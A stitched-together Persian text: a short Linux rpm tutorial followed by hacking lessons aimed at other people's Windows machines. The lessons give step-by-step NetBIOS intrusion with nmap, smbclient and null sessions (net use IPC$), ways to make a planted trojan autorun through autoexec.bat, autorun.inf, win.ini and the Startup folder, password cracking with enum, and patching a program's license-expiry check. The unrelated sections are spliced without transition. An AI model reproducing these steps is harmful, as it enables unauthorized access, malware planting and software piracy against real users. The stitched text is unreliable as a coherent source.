بسیاری از بسته‌های نرم‌افزاری که به یک توزیع خاص (مانند ردهت، SuSE، Debian و...) وابسته نيستند از روش tar/gzip برای فشرده سازی و آرشیو کردن فایل‌ها استفاده می‌کنند. البته ممکن است در سایتهای FTP لینوکس به فرمت‌های دیگری نیز بر بخورید. لازم به ذکر است که برخی از این فایلها مستندات همراه نرم‌افزار بوده و کد منبع یا اجرایی نیستند.

جدول ۱ فرمت های مختلف فایلی که شما هنگام چرخش در سایتهای FTP لینوکس مشاهده خواهید کرد و جدول ۲ برخی فرمت‌های رایج مستنداتی که همراه با نرم‌افزارهای لینوکس ارائه می‌شوند را نشان میدهد.

برای اینکه بدانید یک فایل دارای چه فرمتی است، می‌توانید از دستور file استفاده کنید. به مثال زیر توجه کنید :

$ file telnet.htm
telnet.htm: HTML document text

جدول ۱ انواع فرمت بسته‌های نرم‌افزاری لینوکس

نصب برنامه های کاربردی در لینوکس ردهت

بیشتر برنامه هایی که نیاز به نصب آنها دارید، به صورت فرمت rpm موجود هستند. در صورتی که هیچ بسته rpm ای برای نرم‌افزار مورد نظرتان پیدا نکردید، می‌توانید از کد منبع نرم‌افزار استفاده کنید و خودتان نرم‌افزار مورد نیاز را کامپایل و نصب کنید.

جدول ۲ انواع فرمت مستندات همراه بسته های نرم‌افزاری

نصب و مدیریت بسته های rpm

هنگامی که یک برنامه کاربردی که با فرمت rpm است به دستتان می‌رسد، این بسته معمولا فقط شامل یک فایل است. دستوری که شما برای مدیریت و استفاده از بسته های نرم‌افزاری rpm استفاده می‌کنید، دستور rpm است.

برای مدیریت بسته های rpm ، دستور rpm گزینه‌هایی را برای لیست کردن بسته‌های نصب شده، ارتقا بسته‌های نصب شده، بدست آوردن اطلاعات از محتویات یک بسته و .... ارائه می‌کند. همچنین گزینه‌هایی وجود دارند که توسط آنها می‌توانید بررسی نمایید که کلیه فایل‌های یک بسته نصب شده وجود داشته و تغییر نکرده باشند. دستور rpm در حالتهای زیر کار می‌کند:

- نصب نرم‌افزار (install) با گزینه i

-ارتقا نرم‌افزار (Upgrade) با گزینه U

- کسب اطلاعات از بسته (Query) با گزینه q

- چک کردن بسته (Verify) با گزینه V

- بررسی امضا بسته (Signature check) با گزینه checksig

- برداشتن بسته (Uninstall) با گزینه e

-ساخت بسته (Build) با گزینه b

-ساخت مجدد بانک اطلاعاتی (Rebuild Database) با گزینه rebuilddb

- تصحیح مجوزها (Fix Permissions) با گزینه setperms

- تعیین مالک/گروه (Set Owners/groups) با گزینه setugids

با استفاده از این گزینه‌ها می‌توانید بسته های rpm را نصب کرده، صحت نصب بسته ها را بررسی کنید و اشکالات احتمالی را برطرف نمایید.

احتمالا ميدونيد که Netbios پرتکل معروف مايکروسافت براي ارتباط ويندوز ها با هم و احتمالا Share کردن پرينتر يا فايله. همچنين وقتي که بحث نفوذ به Client و بر بعضي مواقع Server ها پيش مياد، Netbios يکي از اولين انتخاب هاست. ما در اين مقاله سعي ميکنيم از اين ضعف سيستم عاملهاي مايکروسافت سوءاستفاده کنيم.
سيستم عاملهاي بر پاييه يونيکس مثل لينوکس براي Share کردن فايلها و پرينتر ها از طريق Netbios از پرتکل Smb/Cifs که توسط برنامه Samba باز ميشه استفاده ميکنن و از اين طريق لينوکس ميتونه Share هاي کامپيوتر هاي ويندوز رو Mount کنه. (اگه کاربر لينوکس هستيد، نمي‌تونيد روش‌هايي که در درس قبلي براي ويندوز ذکر شده استفاده کنيد، بلکه بايد از Samba بهره گيريد. اما طرف مقابل که قرار است هک بشه، سيستم‌عاملش رو فرض مي‌کنيم که ويندوزه. پس ما مي‌خوايم با لينوکس يک سيستم‌عامل ويندوز را که ۱۳۹ باز داره، هک کنيم) بي شک Netbios عمومي ترين مشکل امنيتي ويندوزه که استفاده ازش چندان مشکل نيست.
خب ! همون طور که گفتم ما براي اين کار از Samba استفاده ميکنيم. من اينجا چيزي در مورد Samba نمي‌نويسم و بنا کار رو بر اين ميگذارم که تا حدودي ميتونيد با Samba کار کنيد . اگر احتمالا مشکلي داريد ميتونيد به Samba.org سر بزنيد و در Documention ها دنبال راهنما باشيد :) به طور کل اگر نميدونيد چطور از Samba استفاده کنيد بهتره که کاري با کامپيوتر هاي مردم نداشته باشيد ! :)


- چگونه با پورت ۱۳۹ صحبت کنيم؟

۱- اولين قدم پيدا کردن کامپيوتريه که پرت 139 و 137 که پرت Netbios هست رو باز کرده باشه. براي اينکار از Nmap استفاده مي‌کنيم. Nmap معمولا رو همه Description هاي فعلي پيدا ميشه. مي‌خوام به کمک Nmap تست کنم که از ip شماره 192.168.3.50 تا 192.168.3.1 کدام‌ها پورت ۱۳۹ باز دارند. براي اين کار مي‌نويسم:

# nmap -sS -O 192.168.3.1-50 -p 139

و جواب مي‌شنوم:

st 1 open and 1 closed TCP port

Interesting ports on  (192.168.3.2):

Port       State       Service

139/tcp    open        netbios-ssn

Remote OS guesses: Windows Millennium Edition (Me), Win 2000,
 or WinXP, MS Windows2000 Professional RC1/W2K Advance Server Beta3

بايد اينو بهتون بگم که من دارم اين کار رو روي Lan انجام ميدم و همه Ip ها Static هستند. ولي خب کار رو جوري در نظر ميگيرم که گويا نميدونم چه Host هاي اينجا وجود دارن :) 192.168.3.1 يک SuSE 8 هست که کار رو از طريقش انجام ميديم و 192.168.3.2 يک win2kpro sp2 هست که قربانيه و البته FireWall نداره :) من اينجا از آيپي هاي کلاس C استفاده ميکنم ممکنه وضع شما تو اينترنت فرق کنه، ولي خب نحوه کار تغيير نميکنه. حالا هدف رو پيدا کرديم، هدف ما 192.168.3.2 هست .

۲- قدم دوم گرفتن NetbiosName هاي هدفه. بدون اين اسمها ما نميتونيم هيچ جور اطلاعاتي از هدف بگيريم. از اونجايي که مايکروسافت سعي کرده همه کارها رو ساده کنه، ويندوز هاي رو شبکه Netbios به جاي Ip Address از اسم استفاده ميکنن!! خب اينجا لازمه از يه Netbios Scanner يا Share Scanner استفاده کنيم. معمولا رو هر Description يي دستور nmblookup پيدا ميشه - که خيلي شبيه nbtstat ويندوزه - رو لينوکس کار ميکنه. من شخصا خيلي از nmblookup خوشم نمياد چون Share Scanner هاي بسيار بهتري هستن ! :) به هر صورت من اينجا از nmblookup استفاده ميکنم . شکل کلي دستور اينه : nmblookup –A . اين flag ه A باعث ميشه که nmblookup بتونه Query بهتري انجام بده . حالا رو هدفهوم امتحان ميکنيم :

# nmblookup –A 192.168.3.2

و جواب مي‌گيرم:

Looking up status of 192.168.3.2

        ARMINLAPTOP     <00> -          B < ACTIVE>

        WORKGROUP       <00> - < GROUP> B < ACTIVE>

        ARMINLAPTOP     <03> -          B < ACTIVE>

        ARMINLAPTOP     <20> -          B < ACTIVE>

        WORKGROUP       <1e> - < GROUP> B < ACTIVE>

        ADMINISTRATOR   <03> -          B < ACTIVE>

        WORKGROUP       <1d> -          B < ACTIVE>

        ..__MSBROWSE__. <01> - < GROUP> B < ACTIVE>

همه چيز مشخصه نه ؟ اسم کامپيوتر ARMINLAPTOP , گروه کامپيوتر WORKGROUP و کاربر فعال Administrator هست :)

۳- بگذارين قبل از قسمت سوم کار يکمي در مورد ويندوز ها صحبت کنيم. Netbios به طور کلي روي همه ويندوز ها به نوعي خطر ايجاد ميکنه. رو ويندوز هاي سري 2000 به بالا همه پارتيشن هاي سيستم Share شده اند و با پسوردي که Administrator دارد، باز ميشن. خيلي از کاربران تازه کار هم پسورد Administrator رو خالي ميگذارن. به نظر من اين سري ويندوز ها بيشتر در خطر هستند. رو ويندوز هاي 9x هيچ فايلي به طور Default Share نشده، ولي خوب اگر بشه ممکنه بتونيم از طريقش بدون پسورد وارد فايل سيستم بشيم :) حتي اگر پسورد Administrator رو هم نداشته باشيم Anonymous Login ميتونه اطلاعات خيلي مفيدي بهموم بده :) حالا مي‌خواهيم ليست Share ها رو بدست بياوريم . ( در درس قبلي براي ويندوز از دستور net view براي همين‌کار استفاده کرديم) توجه کنيد که کرنل بايد Network File System و Samba File System رو ساپرت کرده باشه : در اين مثال در نظر گرفتم که پسورد Administrator خاليه ! :) مي‌نويسم:

# smbclient –Uadministrator –LARMINLAPTOP –I 192.168.3.2

نتيجه دستور به صورت زير است:

added interface ip=192.168.3.1 bcast=192.168.3.255 nmask=255.255.255.0

Password:

Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]

        Sharename      Type      Comment

        ---------      ----      -------

        IPC$           IPC       Remote IPC

        D$             Disk      Default share

        ADMIN$         Disk      Remote Admin

        C$             Disk      Default share

        Armin          Disk

        Server               Comment

        ---------            -------

        ARMINDESKTOP         Samba 2.2.3a

        ARMINLAPTOP

        Workgroup            Master

        ---------            -------

        WORKGROUP            ARMINLAPTOP

خب ميبينيد ؟ :) هر دو پارتيشن ARMINLAPTOP در اختيار شماست ! :) همچنين کامپيوتر هايي که باهاش در ارتباط هستند رو هم ميبينيم. در اين مثال ملاحظه مي‌فرماييد که Armin به عنوان Disk به‌اشتراک گذاشته شده. خب قبل از اينکه بريم سراغ بقيه کار يک بار هم Anonymous رو امتحان ميکنيم ( يه چيزي مثل Null Session ):

# smbclient -LARMINLAPTOP -I 192.168.3.2

و جواب:

added interface ip=192.168.3.1 bcast=192.168.3.255 nmask=255.255.255.0

Password:

Anonymous login successful

Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]

        Sharename      Type      Comment

        ---------      ----      -------

Error returning browse list: NT_STATUS_ACCESS_DENIED

        Server               Comment

        ---------            -------

        ARMINDESKTOP         Samba 2.2.3a

        ARMINLAPTOP

        Workgroup            Master

        ---------            -------

        WORKGROUP            ARMINLAPTOP

خب باز هم يه اطلاعاتي پيدا ميکنيم ! :) با اينکه فايلهاي Share شده رو نميبينيم، به هر صورت از هيچي بهتره ! شايد يه جاي ديگه به درد بخوره !

۴- خب حالا سعي ميکنيم که اين Share هارو Mount کنيم. مي‌نويسيم:

# smbclient //ARMINLAPTOP/Armin -I 192.168.3.2

و جواب مي‌شنوم:

added interface ip=192.168.3.1 bcast=192.168.3.255 nmask=255.255.255.0

Password:

session setup failed: NT_STATUS_LOGON_FAILURE

خب ! :) Share توسط Password محافظت ميشه ! :) کار زيادي نمي‌تونيم انجام بديم. مثلا مي‌تونيم همين Null پسورد رو امتحان کنم، ولي خب اگر با Win9x طرف باشيم کاري نميشه کرد . حالا رو ويندوز 2000 به بالا کار مي‌کنيم. روي اينکه کاربر ناشي باشه و پسورد Administrator رو خالي گذاشته باشه خيلي حساب کرديم :

# smbclient //ARMINLAPTOP/Armin -I 192.168.3.2 -Uadministrator

و جواب مي‌شنوم:

added interface ip=192.168.3.1 bcast=192.168.3.255 nmask=255.255.255.0

Password:

Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]

smb: \>

اين مثل خط فرمان مي‌مونه و مي‌تونين دستورات رو تايپ کنيد براش. کار تمومه! هر کاري که دوست داشته باشين ميتونين با اين راه رو هر Share اي انجام بديد :) مثلا مي‌نويسم:

smb: \> ls

و جواب مي‌شنوم:

  .                                  DA        0  Sat Feb  8 05:34:11 2003

  ..                                 DA        0  Sat Feb  8 05:34:11 2003

  Blcorp                              D        0  Sat Feb  8 03:05:51 2003

                47943 blocks of size 65536. 8261 blocks available

و ادامه مي‌دم به صورت زير:

smb: \> cd Blcorp

smb: \Blcorp\> ls

  .                                   D        0  Sat Feb  8 03:05:51 2003

  ..                                  D        0  Sat Feb  8 03:05:51 2003

  WLTrial.exe                         A  2321412  Mon Apr 29 14:18:58 2002

                47943 blocks of size 65536. 8261 blocks available

smb: \Blcorp\> get WLTrial.exe

getting file WLTrial.exe of size 2321412 as WLTrial.exe (892.2 kb/s) ...

smb: \Blcorp\>

شما ميتونيد از دستور Pull براي فرستادن فايل و get براي گرفتن فايل استفاده کنيد :) فايلها گرفته شده در دايرکتوري فعلي شما ذخيره ميشوند . قسمت اميدوار کننده کار اينه که خيلي از مردم از ويندوز استفاده ميکنن و اکثرشون حتي نميدونن که همه فايل سيستم هاشون بدون پسورد به راحتي قابل دسترسه. خب ما هم اينهارو ياد نمي‌گيريم که دور دنيا بچرخيم و فايلهاي مردم رو پاک کنيم !


- FAQ

- آيا Samba به نا امني Netbios ويندوز است ؟
نه اصلا ! Samba يک برنامه پرقدرته , اگر خوب Config شه احتمال هک شدنش بسيار پايينه ! فرض کنيد از طريق سيستم‌عامل ويندوز مي‌خوام اين کامپيوتري که Samba داره رو هک کنم. دستور تايپ شده و جواب بدست اومده بيانگر امنيت Samba ست:

C:\>nbtstat -A 192.168.3.1

Local Area Connection 2:

Node IpAddress: [192.168.3.2] Scope Id: []

    Host not found

- يک نفوذ بدون مشکل جدي چقدر طول مي‌کشه ؟
موقع هک کردن Client بايد سريع باشيد ! کل اين مراحل حداکثر 3 يا 4 دقيقه وقت ميگيره , فقط نوشتنش طول ميکشه! :)

- چرا هک کردن Netbios از طريق Unix/Linux راحت تر از Windows هست ؟
خب خيلي سريع تره، ابزارهاي بهتر و از همه مهم‌تر اينکه خودتون در معرض خطر نيستيد :

كرك كردن
خيلي ها كرك كردن رو هنر مي دونن بياييد با اين هنر اشناشيم
خب براي شروع يه برنامه لازم داريم كه رجيستر كد بخواد يا اينكه مدتي باشه و بعد از اون كار نكنه خب بياييد ببينيم چجوري يه قفل ساده بنويسيم

البته فقط يه الگوريتم

1: Input Name
2: Input Serial
3: If (function(serial,Number=1)(
4: Print (serial good)
5: Function(GOOD )
6: Else
7: print (selial bad)
8: Function (BAD)
9: Continue …

خب بگيد ساده ترين روش براي تغيير برنامه براي اينكه برنامه وقتي سريال غلط وارد ميكنيم وارد قسمت
GOOD
بشود چيه
0: بريم تو فانكشن چك كردن سريال و اون فانكشن رو تحليل كنيم: خيلي احمقانه است چون روش ساده تري هم وجود داره
1: جاي دو تا فانكشن رو عوض كنيم : خيلي احمقانه است چون روش ساده تري هم وجود داره
2:فقط لازمه برنامه رو اينجوري تغيير بديم
If (function(serial,Number=0)
If (function(serial,Number<>1)
بهمين راحتي :
حالا اگه غلط باشه كار ميكنه اگه درست باشه كار نمي كنه

3: روش سوم پاك كردن خط 3 با اين كار اصلا چك كردني وجود نداره (در اين مثال ا شايد كار نكنه ولي اين روش رو در نظر داشته باشيد )
حالا موقشه شروع كنيم
اين برنامه ها رو دانلود كنيد :

W32dasm
Hiew
Ollydbg
NuMega SoftICE
Reshack
Crackmaker
IDS
Hackman
Dede
Ramcheat
Api spy
Cool debugger
Win32Program Disassembler
Procdump
Hex Workshop
Patcher
Brain (-;

(مغز: البته هر اموزشي كه ميخونم اين يكي رو لازم داره ولي نمي تونم دانلودش كنم )
همه برنامه ها لازم نيست اما اگه مي خواهيد حرفه اي كار كنيد و اسباب اثاثيه تون كامل باشه بد نيست همه رو دانلود كنيد
در مورد سافت ايس بگم من هنوز نتونستم تو اكس پي نصبش كنم شما هم اگه خواستيد نصب كنيد مال ان تي شو بگيريد و چند تا پك رو بايد بهش اضافه كنيد ميگن كار ميكنه ولي خالي مي بندن
(-;
خب از يه برنامه ساده شروع مي كنيم مثل

IPScanner 1.77
Copyright © 2001-2003
http://www.ip-scanner.com/
For suggestions please write toinfo@ip-scanner.com

خب برنامه رو نصب مي كنيم برنامه رو استفاده مي كنيم تازه از برنامه خوشمون امده كه يه وارنينگ هشدار مياد كه ميگه داداش تعداد استفاده ها تموم شده
اين پنجره هشدا ر رو مي بنديم خب همه چيز درسته ولي دكمه استارت اسكن كار نمي كنه ولي بقيه چيز ها درسته
اگه دكمه استارت رو بزنيم ميگه
The program has expired!

خب از برنامه اصلي
Ipscanner.exe
در جايي كه نصب كرديم تو شاخه پروگرم فايل. يه كپي ديگه هم مي گيريم به اسم
ipscannerbackup.exe
با
W32adasm
ان رو باز مي كنيم
اگه چيز هاي عجيب ديديد بخاطر فونت پيشفرضه كه بهتر فونت ديگه اي انتخاب كنيد

از بالا گزينه
Ref---string data refrances
رو مي زنيم تا مرجع و جايي كه جملات از انجا فراخواني ميشن رو پيدا كنيم

خب جمله
The program has expired!
رو پيدا و روش كليك مي كنيم

-----------------------------------------------------
Reference to: The program has expired!

Call dword ptr [0041A2E0]
cmp eax,00000001
jne 004086D2
push FFFFFFFF
push 00000000


------------------------------------------------------
Call dword ptr [0041A2E0]
(function(serial,Number=1)(
توضيح اين قسمت اول يه تابع رو فراخوني مي كنيم
------------------------------------------------------
cmp eax,00000001
If (function(serial,Number=1)(
در اينجا ميشه گفت داريم چك مي كنيم
)Compare(
------------------------------------------------------
jne 004086D2

- NetBIOS چيست؟

NetBIOS مخفف عبارت Network Basic Input/Output System است. NetBIOS ابزاري است که اجازه به اشتراک گذاشتن منابع رو به ما مي‌ده. ما برای به اشتراک گذاشتن فايل‌ها و يا پرينتر مي‌تونيم از اين پروتکل استفاده کنيم. نکته مهم اين است که NetBIOS فقط در سيستم‌عامل ويندوز معني داره (اگرچه ابزارهايي مثل Samba در لينوکس مي‌تونن اونو شبيه سازي کنن ولي بحث ما خود پروتکل NetBIOS است). وقتي NetBIOS در ويندوز فعال باشد، بلافاصله سه تا پورت براي استفاده باز مي‌شوند. پورت مهم و اصلي پورت ۱۳۹ در tcp است که NetBIOS را هم با اين پورت مي‌شناسن. دو پورت ديگر، از نوع udp هستند و عبارتند از پورت ۱۳۷ براي name service و پورت ۱۳۹ براي Datagram service . وقتي قرار باشه که يک سيستم‌عامل ويندوز هک بشه ( خصوصا اگه کلاينت باشه ) يکي از اولين مواردي که به ذهن مي‌رسه، استفاده از NetBIOS ه.
حالا ببينيم منظور از به اشتراک گذاشتن (Sharing) در مورد فايل‌ها و پرينتر‌ها چيست؟
به اشتراک گذاشتن در مورد فايل‌ها يعني قرار دادن تعدادي فايل در يک کامپيوتر خاص به طوريکه توسط ساير کامپيوترها قابل دسترسي و استفاده باشه. در مورد پرينتر به اشتراک گذاشتن يعني طوري چاپگر متصل به يک کامپيوتر را تنظيم کنيم که توسط ساير کامپيوتر‌ها هم قابل استفاده باشه. با توجه به اينکه در سيستم‌عامل‌هاي ويندوز به صورت پيش‌فرض NetBIOS فعال است، پس مي‌توان به تعدادي از فايل‌ها و فولدرهاي تعدادي از کامپيوترهاي روي شبکه دسترسي داشت و فايل‌ها را خواند و حتي کپي يا پاک کرد.


- چگونه با پورت ۱۳۹ صحبت کنيم؟

۱- اولين کاري که مي‌کنيم اين است که براي پورت ۱۳۹ پورت اسکن مي‌کنيم تا ip هايي را که پورت ۱۳۹ در آنها باز است، پيدا کنيم. من اين کار را با nmap انجام مي‌دم. فرض کنيد که يک ip به شماره 217.218.84.29 را تست کرده و به نتيجه زير برسم:

Interesting ports on HOME-TU6U0AV86Y (217.218.84.29):

Port       State       Service

139/tcp    open        netbios-ssn            

Remote operating system guess: Windows Millenn... (Me), Win 2000, or WinXP

اين خروجي اعلام مي‌کند که پورت ۱۳۹ باز است. پس مي‌شود از اين ip استفاده کرد.

۲- حالا مي‌خوام با اين پورت ارتباط برقرار کنم. اصولا بايد مثل سابق از telnet يا nc استفاده کنم ولي در مورد پورت ۱۳۹ روش ارتباطي فرق مي‌کند. کامنت پرامت را باز کرده و دستور زير را مي‌نويسم:

nbtstat -A 217.218.84.29

دستور nbtstat يک ابزار خاص براي کار با NetBIOS است. دقت کنيد که از پارامتر A- با ip مربوطه استفاده کردم. (دستور nbtstat داراي پارامتر‌هاي بسياري است که اگه مي‌خواين همه رو ببينين، بنويسين nbtstat و enter را بزنيد.)
حالا بحث اينه که اين دستور چه‌ کاري مي‌کنه و خروجي به چه صورتي است:
اين دستور به ip مورد نظر وصل مي‌شه و از اون مي‌خواد ليست منابعي رو که به اشتراک گذاشته رو ليست کنه. در اين حالت ۲ حالت ممکنه اتفاق بيوفته:
الف) مواجه با پيغام Host not found بشم. اين يعني اينکه نمي‌تونه ليست منابع را از اون کامپيوتر بگيره (يعني NetBIOS غير فعاله). يعني اگرچه پورت ۱۳۹ بازه ولي قابل استفاده نيست.
ب) ارتباط برقرار بشه و ليست منابع اشتراکي ليست بشه:

           NetBIOS Remote Machine Name Table

       Name               Type         Status

    ---------------------------------------------

    HOME-TU6U0AV86Y<00>  UNIQUE      Registered

    MSHOME         <00>  GROUP       Registered

    HOME-TU6U0AV86Y<20>  UNIQUE      Registered

    MSHOME         <1E>  GROUP       Registered

    MAC Address = 00-53-45-00-00-00

۳- در اين نتايج چيزي که به درد مي‌خوره، سطري است که <20> دارد. اگه <20> نباشد، يعني نمي‌تونين از اشتراک گذاري فايل استفاده کنيد ( به عبارت ساده تر بي‌خيال شو اين کامپيوتر رو ! ). در اين مثال ما اين سطر را داشتيم پس ادامه مي‌دهيم. حالا مي‌نويسم:

net view \\217.218.84.29

حالا اگه گفتين چي ميشه؟ درسته! دو حالت ممکنه اتفاق بيوفته:
الف) پيغام بياد

System error 5 has occurred.

Access is denied.

اين يعني نمي‌تونين ادامه بدين. به عبارت ديگه ايست! ولي يه کاري مي‌تونيد بکنيد و اون اينه که يه null session برقرار کنيد با اون کامپيوتر. اين حالت در مورد ويندوز‌هاي سري NT جواب ميده. مي‌نويسيد:

net use \\217.218.84.29\IPC$ "" /user:""

حالا چرا مي‌گن null session ؟ دليلش اينه که يک ارتباط برقرار کردم با اون ip بدون username و بدون password . حالا اگه اين دستور جواب داد مي‌تونم دوباره دستور net view \\217.218.84.29 را تکرار کنم.
ب) ممکنه دستور ذکر شده جواب بده و مثلا جواب بده:

Shared resources at \\217.218.84.29

Share name   Type         Used as  Comment

------------------------------------------------

Printer      Print                 Acrobat PDFWriter

Printer2     Print                 Acrobat Distiller

SharedDocs   Disk

The command completed successfully.

عاليه. دقت کنيد که در اين کامپيوتر يک فايل (Disk) به اسم ShareDocs به اشتراک گذاشته شده (دو تاي باقي براي پرينتر است). حالا که رسيدم به اين اسم ديگه آخرين دستور را مي‌نويسم.

۴- حالا وقتشه که واقعا عمل به اشتراک گذاشتن رو انجام بديم. براي اينکار بايد يک درايو انتخاب کنيد. حتما مي‌دونيد که درايو چيه. وقتي شما My Computer را دابل کليک کرده و باز مي‌کنيد، يک سري آيکون مي‌بينيد که هر کدام اسمي‌ دارند. مثلا :A براي فلاپي و و و تا مي‌رسيد به cdrom که آخرين حرف را دارد. مثلا فرض کنيد که :K باشه. حالا بايد اسم درايو رو براي اشتراک گذاشتن انتخاب کنيد. براي اين‌کار حرف بعدي در زبان انگليسي رو به کار ببريد. چون در کامپيوتر من :K آخرين بود، من حرف بعدي يعني :L را انتخاب مي‌کنم و دستور زير را مي‌نويسم:

net use L: \\217.218.84.29\SharedDocs

به اسم درايو، ip و نام مربوطه که ShareDocs دقت کنيد. چون من اصطلاحا به صورت null session دارم ارتباط مي‌گيرم، ممکنه کار نکنه ولي اگه درست کار کنه جواب مي‌شنوم:

The command completed successfully.

معرکه است!!! حالا My Computer رو باز کنيد و ببينيد که درايو جديد به ليست درايوها اضافه شده که مي‌تونين مثل درايوهاي معمولي با اون کار کنيد و فايل کپي کنيد و ...

۵- وقتي کار تموم شد مي‌تونيد درايو رو حذف کنيد. براي اينکار مي‌تونين روي درايو رايت‌کليک کنيد و Disconnect را انتخاب کنيد. و يا اينکه از دستور

net use /delete L:

استفاده کنيد.


- نکته نکته نکته

۱- يه روش جالب به جاي مرحله ۴ در بالا اينه که مثلا در مرورگر يا در run بنويسيد 217.218.84.29\\ که ip داراي اشتراک است و يا اينکه تايپ کنيد SharedDocsت\217.218.84.29\\ که اصولا بايد جواب بده ( ولي من خودم تست نکردم اينو ).
۲- من دارم به صورت استاندارد کار مي‌کنم. بعدا خواهم گفت که چطوري مي‌تونيم وقتي تو بعضي از مراحل متوقف مي‌شيم، اونو دور بزنيم.
۳- NetBIOS فقط براي کلاينت‌ها نيست. من خودم يکبار سايت دانشگاه رو با اون هک کردم. البته با exploit کردن که بعدا خواهم گفت.
۴- اگه داريد يک کلاينت رو هک مي‌کنيد، بايد سريع عمل کنيد تا قبل از اينکه طرف disconnect کنه کار شما تموم شده باشه.
۵- روش‌هاي ديگري هم براي کار با NetBIOS هست که يکي از اون روش‌ها استفاده از يک سري نرم‌افزارهاي خاص است که تو درس بعدي توضيح مي‌دم و نيز يک روش ديگه اعمال تغييرات در فايل‌هاي HOST و LMHOST و استفاده از find در سيستم‌عامل ويندوز است. ولي چون اين روش دنگ و فنگش زياده، جالب نيست.
۶- براي اينکه بتونيم با NetBIOS کار کنيم، علاوه بر اينکه در کامپيوتر طرف مقابل بايد فعال باشه، روي کامپيوتر خودمون هم فعال باشه. چون در حالت پيش‌فرض در کامپيوتر فعال است، معمولا مشکلي نيست.


- چگونه NetBIOS را روي کامپيوتر خودمان فعال يا غير فعال کنيم؟

براي غيرفعال کردن NetBIOS در ويندوز با توجه به نوع آن ويندوز روش‌هاي مختلفي هست. جدول پاييني براي همين موضوع طراحي شده است:

۱- وقتي پورت ۱۳۹ رو مي‌بنديد، ديگه نمي‌تونيد از NetBIOS استفاده کنيد ( مگر اينکه دوباره پورت رو به صورت فعال در‌ آوريد). پس وقتي که کسي رو مي‌خواهيد هک کنيد، نياز داريد که براي مدت کوتاهي دوباره پورت رو فعال کنيد.

۲- مي‌بينيد که مثلا براي ويندوز ۲۰۰۰ به سه روش کار کنيد، در اين جدول فقط کافي است يکي رو اعمال کنيد.

۳- اگه بعد از غير فعال کردن، دوباره بخواهيد فعال کنيد، در مرحله آخر هر يک از روش‌هاي بالا، گزينه‌اي که مخالف گزينه ذکر شده در جدول است رو انتخاب کنيد، مثلا اگه در جدول Enabled را نوشته‌ايم، شما Disable را انتخاب کنيد.


- چگونه از اين امکانات به اشتراک گذاشتن، براي اجراي يک تروجان روي کامپيوتر قرباني استفاده کنيم؟

خوب ما هنوز طريقه استفاده از تروجان رو ياد نگرفتيم ولي سعي مي‌کنم تو يکي از درس‌هاي آينده اونو توضيح بدم. ما اينجا مي‌خواهيم از تروجان در رابطه با پورت ۱۳۹ استفاده کنيم. حالا سوال اين است که تروجان (trojan) چيست؟
تروجان به‌طور ساده برنامه‌اي اجرايي است، که ما براي طرف مقابل مي‌فرستيم و اگه طرف مقابل اونو اجرا کنه، ما مي‌تونيم کنترل سيستم‌ اونو به دست بياريم. تا اينجا کافي است فعلا ولي بعدا بيشتر توضيح مي‌دم.
حالا همان بحث تروجان ولي در رابطه با پورت ۱۳۹ :
روش کار به اين صورت است که فرضا من الان تونستم يک درايو رو از يک کامپيوتر با پورت باز Share کنم. حالا فايل تروجان ( سرور تروجان ) را upload مي‌کنم به اون کامپيوتر و اسمي براش انتخاب مي‌کنم که طرف مقابل رو به اجراي فايل تشويق کنه. يک اشتباهي که بعضي‌ها مي‌کنند اينه که بعد از کپي کردن تروجان در کامپيوتر هدف، خود هکر مي‌آد و فايل رو دابل کليک مي‌کنه، در اين حالت تروجان روي کامپيوتر خودمون (هکر) اجرا مي‌شه نه کامپيوتر قرباني. پس ما فقط فايل رو مي‌فرستيم و منتظر مي‌مونيم که طرف مقابل اجرا کنه.

حالا چند روش رو مطرح مي‌کنم که در شرايط خاص حالتي رو ايجاد مي‌کنه که نيازي با دابل‌کليک توسط قرباني نباشد:
۱- اگه به درايو C کامپيوتر مقابل دسترسي داريد، يک سطر به فايل autoexec.bat اضافه کنيد که نام و مسير فايل اجرايي را در اون سطر بنويسيد. مثلا اگه اسم تروجان ali.exe باشد و در مسير d:\newfolder باشد، سطري که اضافه مي‌کنيم به صورت زير است:

d:\newfolder\ali.exe

در اين حالت به محض اولين restart کامپيوتر، تروجان اجرا خواهد شد.
۲- اگه به درايو C دسترسي داريد، مي‌تونيد فايلي به اسم Autorun.inf ايجاد کنيد و دستورات زير را بنويسيد ( سطر آخر مطابق با همان تروجان فرضي که در مثال قبل گفتيم، نوشته شده است، اونو با توجه به اسم تروجان و مسير اون تغيير دهيد) :

[autorun]

open=d:\newfolder\ali.exe

۳- اگه به فولدر ويندوز دسترسي داريد، مي‌تونيد يک سطر مثل همان مثال قبل ولي براي فايل winstart.bat اجرا کنيد. در اين حالت هم به محض restart اجرا خواهد شد.
۴- اگه به فولدر ويندوز دسترسي داريد، در فايل win.ini و بعد از قسمتي که [windows] نوشته، اين سطر رو اضافه کنيد:

run=d:\newfolder\ali.exe

۵- اگه به فولدر ويندوز دسترسي داريد، مي‌تونيد تروجان رو به فولدر Start Menu\Startup اضافه کنيد. در اين حالت نيازي به ويرايش هيچ فايل ديگري نيست.


- ابزارهاي کمکي: ۱- ابزارهاي خط فرماني


۱- enum :
اين برنامه را از اينجا داون‌لود کنيد. enum نرم‌افزاري با قابليت‌هاي فوق‌العاده است. از جمله توانايي‌هايي که دارد، در مواردي است که کامپيوتر طرف مقابل براي اعمال sharing از ما پسورد بخواد. در اين موارد مي‌تونيم به کمک enum و ليستي از پسوردهايي که در يک فايل ذخيره شده، تعداد زيادي پسورد رو چک کنيم ( اصطلاحا cracking ) و شايد به نتيجه برسيم. ( اين موضوع را بعدا بيشتر توضيح مب‌دم) کاربردي که الان مد نظر ماست، پيدا کردن ليست share هايي است که کامپيوتر مقابل براي ما باز گذاشته است. مثلا من دستور زير را تايپ کردم، تا ليست اشتراک‌هاي آن ip خاص در آن لحظه رو بدست بيارم:

enum -S 217.218.84.29

و جواب شنيدم:

server: 217.218.84.29

setting up session... success.

enumerating shares (pass 1)... got 10 shares, 0 left:

  E$  IPC$  D$  print$  SharedDocs  F$  Printer2  ADMIN$  C$  Printer

cleaning up... success.

ملاحظه مي‌فرماييد که درايو‌هاي E و D و F و C و نيز SharedDocs و ... ليست شده است. بقيه مراحل مثل درس ۲۱ است. (دقت کنيد که در اين حالت نيازي به null session نيست ).

۲- nbtscan :
